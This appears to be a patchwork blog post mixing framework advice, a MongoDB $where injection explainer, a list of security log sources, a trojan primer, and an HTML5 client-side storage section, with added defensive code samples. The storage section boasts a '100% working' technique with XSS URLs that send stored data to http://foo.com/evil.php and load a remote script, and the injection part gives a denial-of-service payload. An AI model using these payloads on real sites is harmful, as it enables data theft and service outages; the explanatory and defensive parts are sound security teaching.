Choosing a JavaScript Framework, the only way?

Choosing a JavaScript Framework

Which JavaScript framework will be best for you? Let us start by asking what you actually need, because in the end it is not only about JavaScript frameworks.

Many people find it very difficult to choose a JavaScript framework. But I think the real question is framework vs. libraries. Using a framework may lead to lock-in, whereas a library-based approach yields more flexibility. Don't get me wrong: frameworks are great in that they solve a lot of common concerns. That is just what you want for prototyping and for development up to a point.

Frameworks Come with Boundaries

The problems begin as you start hitting the boundaries and go beyond what the framework was meant for. As the framework you are using gains new features you will likely want to keep your application up to date. This incurs some cost and may lead to bigger refactoring at worst.


Libraries Are More Flexible

In a library-based approach (say React + some router + some data solution) you can be more flexible. As technologies come and go you can upgrade portions of your application as you want. There is no need for big upheavals; instead you set the pace. Say a better router comes up: you can replace that specific portion without disrupting the rest of the application.

Both Approaches Are Valid

Both approaches have their merits. I don't expect frameworks to go anywhere. I do believe a library-based approach is a little underappreciated at the moment. It requires more legwork and comes with more technical challenges when you are starting out, but the flexibility it yields may just be worth it. As I said, it depends on the context.

NoSQL Injection

Server-side JavaScript injection vulnerabilities are not limited to application code. NoSQL database engines that process JavaScript containing user-specified parameters can also be vulnerable. For example, MongoDB supports the use of JavaScript functions for query specifications. Since MongoDB databases do not have strictly defined schemas, using JavaScript for query syntax allows developers to write complex queries against disparate document structures. Suppose we have a MongoDB collection that contains some documents representing books, some representing movies, and some representing music albums. This JavaScript query function will select all the documents in the specified collection that were either written, filmed, or recorded in the specified time:

function() {
  var search_time = input_value; // input_value: the user-supplied search value
  return this.publishingTime == search_time ||
         this.filmingTime == search_time ||
         this.recordingTime == search_time;
}

If the application developer were building this application in PHP (for example), the source code might look like this:

$query = 'function() {' .
         '  var search_time = \'' . $_GET['year'] . '\';' .
         '  return this.publishingTime == search_time || ' .
         '         this.filmingTime == search_time || ' .
         '         this.recordingTime == search_time; }';

$cursor = $collection->find(array('$where' => $query));

This code uses the value of the request parameter "year" as the search parameter. However, just as in a traditional SQL injection attack, since the query syntax is being constructed in an ad-hoc fashion (i.e. query syntax concatenated with user input), this code is vulnerable to a server-side JavaScript injection attack. For example, this request would be an effective DoS attack against the system:

http://server/app.php?year=1995';while(1);var%20foo='bar
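The same search written two ways, as an added example that is not code from the original post or from the book it credits. The unsafe builder reproduces the concatenation pattern of the PHP snippet above; the safe builder validates the parameter and emits a plain filter document, so the database never evaluates user-controlled JavaScript. The field names (publishingTime, filmingTime, recordingTime) are taken from the post; the sample collection and the matchDocuments() stand-in for collection.find() are constructed for this example, so no MongoDB is needed to run it.

```javascript
// Added example, not code from the original post: the book/movie/album search
// built two ways. buildWhereQueryUnsafe() reproduces the concatenation pattern
// of the PHP snippet above; buildSafeQuery() validates the parameter and emits
// a plain filter document, so the database never evaluates user-controlled
// JavaScript. matchDocuments() is a constructed stand-in for collection.find()
// that only understands the $or/equality filter produced here; no MongoDB needed.

// Constructed sample collection with the three document shapes from the post.
const COLLECTION = [
  { title: "Book A", publishingTime: 1995 },
  { title: "Movie B", filmingTime: 1995 },
  { title: "Album C", recordingTime: 2001 },
];

// UNSAFE: the request parameter is spliced into JavaScript source that the
// application would hand to MongoDB's $where operator. Kept only to show how
// the injected text ends up inside the function body.
function buildWhereQueryUnsafe(yearParam) {
  return (
    "function() { var search_time = '" + yearParam + "';" +
    " return this.publishingTime == search_time ||" +
    " this.filmingTime == search_time ||" +
    " this.recordingTime == search_time; }"
  );
}

// SAFE: accept only a four-digit year and express the search as a filter
// document. Values inside a filter document are data, never executable code.
function buildSafeQuery(yearParam) {
  if (typeof yearParam !== "string" || !/^\d{4}$/.test(yearParam)) {
    throw new TypeError("year must be exactly four digits");
  }
  const year = Number(yearParam);
  return {
    $or: [
      { publishingTime: year },
      { filmingTime: year },
      { recordingTime: year },
    ],
  };
}

// Minimal in-memory matcher for the filter shape above (equality inside $or).
function matchDocuments(collection, filter) {
  return collection.filter((doc) =>
    filter.$or.some((clause) =>
      Object.entries(clause).every(([field, value]) => doc[field] === value)
    )
  );
}

// The DoS payload from the post, URL-decoded: it closes the string literal
// and appends an endless loop that a $where evaluation would run.
const INJECTED = "1995';while(1);var foo='bar";

// Compare the two builders on the hostile input and run a legitimate search.
function demo() {
  const unsafe = buildWhereQueryUnsafe(INJECTED);
  let safeRejected = false;
  try {
    buildSafeQuery(INJECTED);
  } catch (err) {
    safeRejected = err instanceof TypeError;
  }
  const hits = matchDocuments(COLLECTION, buildSafeQuery("1995"));
  return {
    unsafeContainsLoop: unsafe.includes("while(1)"),
    safeRejected,
    hits: hits.map((d) => d.title),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The design point is that the fix is not better escaping of the string: it is removing the `$where` path altogether. A filter document carries the year as a number, so there is no string context for the injected text to break out of, and the allow-list validation rejects the payload before it reaches the database at all.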

Credits: SQL Injection Attacks and Defense.

Some Security Software

Most organizations use several types of network-based and host-based security software to detect malicious activity, protect systems and data, and support incident response efforts. Accordingly, security software is a major source of computer security log data. Common types of network-based and host-based security software include the following:

Network Quarantine Servers : Some organizations check each remote host’s security posture before allowing it to join the network. This is often done through a network quarantine server and agents placed on each host. Hosts that do not respond to the server’s checks or that fail the checks are quarantined on a separate virtual local area network segment. Network quarantine servers log information about the status of checks, including which hosts were quarantined and for what reasons.

Routers : Routers may be configured to permit or block certain types of network traffic based on a policy. Routers that block traffic are usually configured to log only the most basic characteristics of blocked activity.

Web Proxies : Web proxies are intermediate hosts through which Web sites are accessed. Web proxies make Web page requests on behalf of users, and they cache copies of retrieved Web pages to make additional accesses to those pages more efficient. Web proxies can also be used to restrict Web access and to add a layer of protection between Web clients and Web servers. Web proxies often keep a record of all URLs accessed through them.

Vulnerability Management Software : Vulnerability management software, which includes patch management software and vulnerability assessment software, typically logs the patch installation history and vulnerability status of each host, which includes known vulnerabilities and missing software updates. Vulnerability management software may also record additional information about hosts' configurations. Vulnerability management software typically runs occasionally, not continuously, and is likely to generate large batches of log entries.

Remote Access Software : Remote access is often granted and secured through virtual private networking (VPN). VPN systems typically log successful and failed login attempts, as well as the dates and times each user connected and disconnected, and the amount of data sent and received in each user session. VPN systems that support granular access control, such as many Secure Sockets Layer (SSL) VPNs, may log detailed information about the use of resources.

Antimalware Software : The most common form of antimalware software is antivirus software, which typically records all instances of detected malware, file and system disinfection attempts, and file quarantines. Additionally, antivirus software might also record when malware scans were performed and when antivirus signature or software updates occurred. Antispyware software and other types of antimalware software (e.g., rootkit detectors) are also common sources of security information.

Intrusion Detection and Intrusion Prevention Systems : Intrusion detection and intrusion prevention systems record detailed information on suspicious behavior and detected attacks, as well as any actions intrusion prevention systems performed to stop malicious activity in progress. Some intrusion detection systems, such as file integrity checking software, run periodically instead of continuously, so they generate log entries in batches instead of on an ongoing basis.

Firewalls : Like routers, firewalls permit or block activity based on a policy; however, firewalls use much more sophisticated methods to examine network traffic. Firewalls can also track the state of network traffic and perform content inspection. Firewalls tend to have more complex policies and generate more detailed logs of activity than routers.

Authentication Servers : Authentication servers, including directory servers and single sign-on servers, typically log each authentication attempt, including its origin, username, success or failure, and date and time.
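What makes these sources useful is that their records can be normalised and correlated. The following is an added example, not part of the original post or of any product: a handful of constructed log lines imitating four of the sources listed above (an authentication server, a firewall, a VPN concentrator and antivirus) are parsed into one event shape, and a simple detection rule is run over them. The line format ("source timestamp key=value ...") is invented for this example; every real product has its own format and needs its own parser.

```javascript
// Added example, not part of the original post or of any product: constructed
// log lines imitating four of the sources above are normalised into one event
// shape and a simple detection is run over them. The "source timestamp
// key=value ..." format is invented for this example.
const SAMPLE_LOGS = [
  "auth 2024-01-10T08:00:01Z src=10.0.0.5 user=alice result=FAIL",
  "auth 2024-01-10T08:00:04Z src=10.0.0.5 user=alice result=FAIL",
  "auth 2024-01-10T08:00:09Z src=10.0.0.5 user=alice result=FAIL",
  "auth 2024-01-10T08:00:12Z src=10.0.0.5 user=alice result=OK",
  "fw   2024-01-10T08:00:13Z action=BLOCK src=10.0.0.5 dst=10.0.1.9 dport=445",
  "vpn  2024-01-10T08:01:00Z user=bob event=CONNECT src=203.0.113.7 bytes_in=0 bytes_out=0",
  "vpn  2024-01-10T08:40:00Z user=bob event=DISCONNECT src=203.0.113.7 bytes_in=120000 bytes_out=4000",
  "av   2024-01-10T08:02:00Z host=ws-12 action=QUARANTINE file=C:\\tmp\\x.exe threat=Trojan.Generic",
];

// Turn one line into a flat event: { source, ts, ...key/value fields }.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  const event = { source: parts[0], ts: parts[1] };
  for (const kv of parts.slice(2)) {
    const idx = kv.indexOf("=");
    if (idx > 0) event[kv.slice(0, idx)] = kv.slice(idx + 1);
  }
  return event;
}

// Rule: `threshold` or more failed logins for one user from one source,
// followed by a success from the same source within `windowMs`, is flagged
// as a possible password-guessing attempt that eventually succeeded.
function detectFailThenSuccess(events, threshold = 3, windowMs = 60000) {
  const findings = [];
  const recentFailures = new Map(); // "user@src" -> [timestamps in ms]
  for (const e of events) {
    if (e.source !== "auth") continue;
    const key = e.user + "@" + e.src;
    const t = Date.parse(e.ts);
    // Keep only failures still inside the window relative to this event.
    const fails = (recentFailures.get(key) || []).filter((x) => t - x <= windowMs);
    if (e.result === "FAIL") {
      fails.push(t);
      recentFailures.set(key, fails);
    } else if (e.result === "OK") {
      if (fails.length >= threshold) {
        findings.push({ rule: "fail-then-success", user: e.user, src: e.src, failures: fails.length, at: e.ts });
      }
      recentFailures.delete(key);
    }
  }
  return findings;
}

// Parse everything, count events per source, run the rule, list quarantines.
function analyse(lines) {
  const events = lines.map(parseLine);
  const bySource = {};
  for (const e of events) bySource[e.source] = (bySource[e.source] || 0) + 1;
  return {
    bySource,
    findings: detectFailThenSuccess(events),
    quarantined: events
      .filter((e) => e.source === "av" && e.action === "QUARANTINE")
      .map((e) => e.file),
  };
}

console.log(JSON.stringify(analyse(SAMPLE_LOGS), null, 2));
```

On the sample data the rule fires once (three failures for alice from 10.0.0.5, then a success eleven seconds later); the firewall block and VPN session records are parsed into the same shape but are not used by this rule, which is the point of normalising first: any later correlation (say, a quarantine on the host that just logged in) works on one event type rather than on four raw formats.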

Credits: Wikipedia

Network Threat : The Trojan Horse

What is a Trojan Horse?

A trojan horse is used to enter a victim's computer, granting the attacker unrestricted access to the data stored on that computer and causing great damage to the victim. A trojan can be a hidden program that runs on your system without your knowledge, or it can be 'wrapped' into a program, meaning that this program may have hidden functions that you are not aware of.

Different types of trojans:

1) FTP trojans : These trojans open an FTP server on the victim's machine that might store and serve illegal software and/or sensitive data, and allow attackers to connect to your machine via FTP.

2) Destructive trojans : The only function of these trojans is to destroy and delete files. This makes them very simple to use. They can automatically delete all the core system files on your machine. The trojan can either be activated by the attacker or can work like a logic bomb that starts on a specific day and time.
A destructive trojan is a danger to any computer network. In many ways it is similar to a virus, but the destructive trojan has been created purposely to attack you, and therefore is unlikely to be detected by your antivirus software.

3) Proxy trojans : These trojans turn the victim’s computer into a proxy server, making it available to the whole world or to the attacker alone. It is used for anonymous Telnet, ICQ, etc., to make purchases with stolen credit cards, and for other such illegal activities. This gives the attacker complete anonymity and the opportunity to do everything from YOUR computer, including the possibility to launch attacks from your network.
 
4) Denial of Service (DoS) attack trojans : These trojans give the attacker the power to start a Distributed Denial of Service attack if there are enough victims. The main idea is that if you have 500 infected ADSL users and you attack the victim simultaneously from each, this will generate HEAVY traffic, causing its access to the Internet to shut down.

5) Security software disablers : These are special trojans, designed to stop/kill programs such as antivirus software, firewalls, etc. Once these programs are disabled, the hacker is able to attack your machine more easily.

6) Data-sending trojans : The purpose of these trojans is to send data back to the hacker with information such as passwords (ICQ, IRC, FTP, HTTP) or confidential information such as chat logs, address lists, etc. The trojan could look for specific information in particular locations or it could install a key-logger and simply send all recorded keystrokes to the hacker.



7) Remote access trojans :  These are probably the most publicized trojans, because they provide the attacker with total control of the victim’s machine. Example : Back Orifice trojans. The idea behind them is to give the attacker COMPLETE access to someone’s machine, and therefore full access to files, private conversations, accounting data, etc. Some trojans can also automatically connect to IRC and can be controlled through IRC commands almost anonymously, without the attacker and the victim ever making a real TCP/IP connection.

Another question: how can I get infected?
Generally, attacks are carried out through:

1) Infection via attachment (of course emails: the most common way)

2) Infection by downloading files from a website (another common way)

Now the most important thing: how do you protect your network from trojans?

OK, if you think that anti-virus software alone will protect your system and network from trojan attacks, you are wrong. Anti-virus software only helps to some extent.
To effectively protect your network against trojans, you must follow a multi-level security strategy:

1. You need to implement gateway virus scanning and content checking at the perimeter of your network for email, HTTP and FTP – It is no good having email anti-virus protection, if a user can download a trojan from a website and infect your network.

2. You need to implement multiple virus engines at the gateway – Although a good virus engine usually detects all known viruses, it is a fact that multiple virus engines jointly recognize many more known trojans than a single engine.

3. You need to quarantine/check executables entering your network via email and web/FTP at the gateway. You have to analyze what the executable might do.

4. Do not open unsolicited attachments in email messages.

5. Do not follow unsolicited links.

6. Maintain updated anti-virus software.

7. Use an Internet firewall.

8. Secure your web browser.

9. Keep your system patched.
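Step 3 above (quarantine and check executables at the gateway) is only as good as the test used to decide what counts as an executable. The following is an added example, not code from the original post or from any gateway product: an attachment is judged by its leading "magic" bytes as well as its file name, so an executable renamed to .jpg or hidden behind a double extension does not slip past an extension-only filter. The extension list, byte samples and file names are constructed for this example, and the function assumes a Node.js Buffer as input.

```javascript
// Added example, not code from the original post: a gateway-style check for
// step 3 above. An attachment is judged by its content (leading "magic"
// bytes) as well as its file name. Extension list and samples are constructed.
const EXECUTABLE_EXTENSIONS = new Set([
  "exe", "dll", "scr", "com", "pif", "msi", "bat", "cmd", "vbs", "js", "jar", "sh", "ps1",
]);

// Last extension only, lower-cased ("invoice.pdf.exe" -> "exe").
function extensionOf(name) {
  const m = /\.([A-Za-z0-9]+)$/.exec(name);
  return m ? m[1].toLowerCase() : "";
}

// Recognise a few executable formats from their first bytes.
function sniffExecutable(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a) return "pe (MZ header)";
  if (bytes.length >= 4 && bytes[0] === 0x7f && bytes[1] === 0x45 && bytes[2] === 0x4c && bytes[3] === 0x46) return "elf";
  if (bytes.length >= 2 && bytes[0] === 0x23 && bytes[1] === 0x21) return "script (#! line)";
  return null;
}

// Decide deliver/quarantine and record every reason so the log is reviewable.
function classifyAttachment(name, bytes) {
  const ext = extensionOf(name);
  const sniffed = sniffExecutable(bytes);
  const reasons = [];
  if (EXECUTABLE_EXTENSIONS.has(ext)) reasons.push("executable extension ." + ext);
  if (sniffed) reasons.push("content looks like " + sniffed);
  if (sniffed && !EXECUTABLE_EXTENSIONS.has(ext)) reasons.push("extension does not match content");
  return { name, action: reasons.length ? "quarantine" : "deliver", reasons };
}

// Constructed samples: a double-extension PE, a PE renamed to .jpg, a shell
// script, and a plain text file that should be delivered untouched.
const SAMPLES = [
  ["invoice.pdf.exe", Buffer.from([0x4d, 0x5a, 0x90, 0x00])],
  ["holiday.jpg", Buffer.from([0x4d, 0x5a, 0x90, 0x00])],
  ["install.sh", Buffer.from("#!/bin/sh\necho hi\n")],
  ["notes.txt", Buffer.from("plain text")],
];

function runSamples() {
  return SAMPLES.map(([name, bytes]) => classifyAttachment(name, bytes));
}

console.log(JSON.stringify(runSamples(), null, 2));
```

A real gateway would add more signatures and also open archives, since a trojan inside a zip shows the archive's bytes rather than its own; the example keeps only the decision logic, which is the part worth understanding: quarantine on either signal, and treat a mismatch between name and content as its own reason to look closer.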

Good Luck !!

Client-side Storage using HTML5, really secure or just an abuse?

HTML5 has introduced new ways to save large amounts of data on the PC through the browser (use Chromium or Chrome to see how this works). Hackers could steal or modify sensitive data online or offline. If a web application that uses this kind of (client-side) storage is vulnerable to XSS attacks, an attack payload can read or modify the content of known storage keys on the victim's computer. If the web application loads data or code from local storage, it can also be quite powerful to inject malicious code that will be executed every time the web application requests it.

Working technique (100% working technique; I had success doing this, you just have to use your brain):

Storage Object Enumeration

var ss = "";
for (var i in window.sessionStorage) {
  ss += i + " ";
}
var ls = "";
for (var i = 0; i < localStorage.length; i++) {
  ls += localStorage.key(i) + " ";
}

Database Object Enumeration

var db = "";
for (var i in window) {
  // Web SQL database handles stringify to "[object Database]"
  if (window[i] == "[object Database]") {
    db += i + " ";
  }
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()

One Shot Attack:

http://blah_blah.com/page.php?name=<script>document.write('<img src="http://foo.com/evil.php?name=' %2B globalStorage[location.hostname].mykey %2B '">');</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql("SELECT * FROM client_tb", [], function(tx, result){ document.write('<img src="http://foo.com/evil.php?name=' %2B result.rows.item(0)['col_data'] %2B '">'); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js></script>


Defenses

Website: avoid saving sensitive data on the user's machine and clear the client-side storage whenever possible.

Web browser: users should regularly check the content of the HTML5 client-side storage saved by their browser and delete what they do not need.
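Both defenses come down to knowing what is in the storage and removing what should not be there. The following is an added example, not code from the original post: an audit that walks a Web Storage area, flags entries whose key name or value shape suggests a credential, and removes the flagged ones. It is written against the standard Storage interface (length, key, getItem, removeItem), so in a browser you would call auditStorage(window.localStorage) or auditStorage(window.sessionStorage); the MemoryStorage class and the sample entries are constructed stand-ins so the same code also runs under Node. The detection patterns are heuristics chosen for this example, not a complete list.

```javascript
// Added example, not code from the original post: audit a Web Storage area
// for entries that look like secrets and purge them. MemoryStorage is a
// constructed stand-in implementing the subset of the Storage interface used
// here, so the example runs outside a browser too.
class MemoryStorage {
  constructor(entries = {}) { this.map = new Map(Object.entries(entries)); }
  get length() { return this.map.size; }
  key(i) { return Array.from(this.map.keys())[i] ?? null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }
  removeItem(k) { this.map.delete(k); }
}

// Heuristics (constructed for this example): key names that usually hold
// credentials, values shaped like a JWT, and values shaped like a card number.
const SENSITIVE_KEY = /(token|secret|passw|session|auth|jwt|api[_-]?key)/i;
const JWT_VALUE = /^[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}$/;
const CARD_VALUE = /^(?:\d[ -]?){13,19}$/;

// Walk the storage via the standard length/key/getItem API and report
// every entry that trips at least one heuristic, with the reasons.
function auditStorage(storage) {
  const flagged = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key) ?? "";
    const reasons = [];
    if (SENSITIVE_KEY.test(key)) reasons.push("key name suggests a credential");
    if (JWT_VALUE.test(value)) reasons.push("value is shaped like a JWT");
    if (CARD_VALUE.test(value)) reasons.push("value is shaped like a card number");
    if (reasons.length) flagged.push({ key, reasons });
  }
  return flagged;
}

// Remove the flagged entries; returns how many entries remain.
function purgeFlagged(storage, flagged) {
  for (const { key } of flagged) storage.removeItem(key);
  return storage.length;
}

// Constructed sample contents: two harmless entries and three that an
// application should not have left on the client.
function makeSample() {
  return new MemoryStorage({
    theme: "dark",
    auth_token: "abc.def.ghi",
    cart: "[1,2,3]",
    "session-id": "x".repeat(12) + "." + "y".repeat(12) + "." + "z".repeat(12),
    cardNumber: "4111 1111 1111 1111",
  });
}

function demo() {
  const storage = makeSample();
  const flagged = auditStorage(storage);
  const remaining = purgeFlagged(storage, flagged);
  return { flagged, remaining };
}

console.log(JSON.stringify(demo(), null, 2));
```

Note what the audit cannot do: it reads only the origin it runs in, because Web Storage is partitioned per origin, and it cannot tell a value the application genuinely needs from one left behind by mistake. That is why the first defense above (do not put the sensitive value there at all) matters more than the second.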

LSO Storage Locations: (I only know the Linux one; unfortunately I am not a Windows user :p)

Linux :

/home/$user/.macromedia/Flash_Player/#SharedObjects
